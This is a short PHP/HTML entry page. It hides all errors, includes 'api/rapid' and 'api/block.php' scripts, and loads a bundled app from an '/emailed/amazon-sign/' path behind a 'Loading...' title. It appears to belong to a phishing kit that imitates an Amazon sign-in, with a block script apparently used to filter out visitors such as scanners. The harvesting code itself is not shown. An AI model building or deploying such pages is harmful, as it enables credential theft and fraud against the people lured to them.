<?php 
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(0);
include("./api/rapid/index.php");
include_once "./api/block.php"; 
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/x-icon" href="ico.ico" />
    <link rel="shortcut icon" type="image/x-icon" href="ico.ico" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Loading...</title>
    <script type="module" crossorigin src="/emailed/amazon-sign/assets/index-CnLjbVLk.js"></script>
    <link rel="stylesheet" crossorigin href="/emailed/amazon-sign/assets/index-CA5b330U.css">
  </head>
  <body>
    <div id="indexbarrrr"></div>
  </body>
</html>
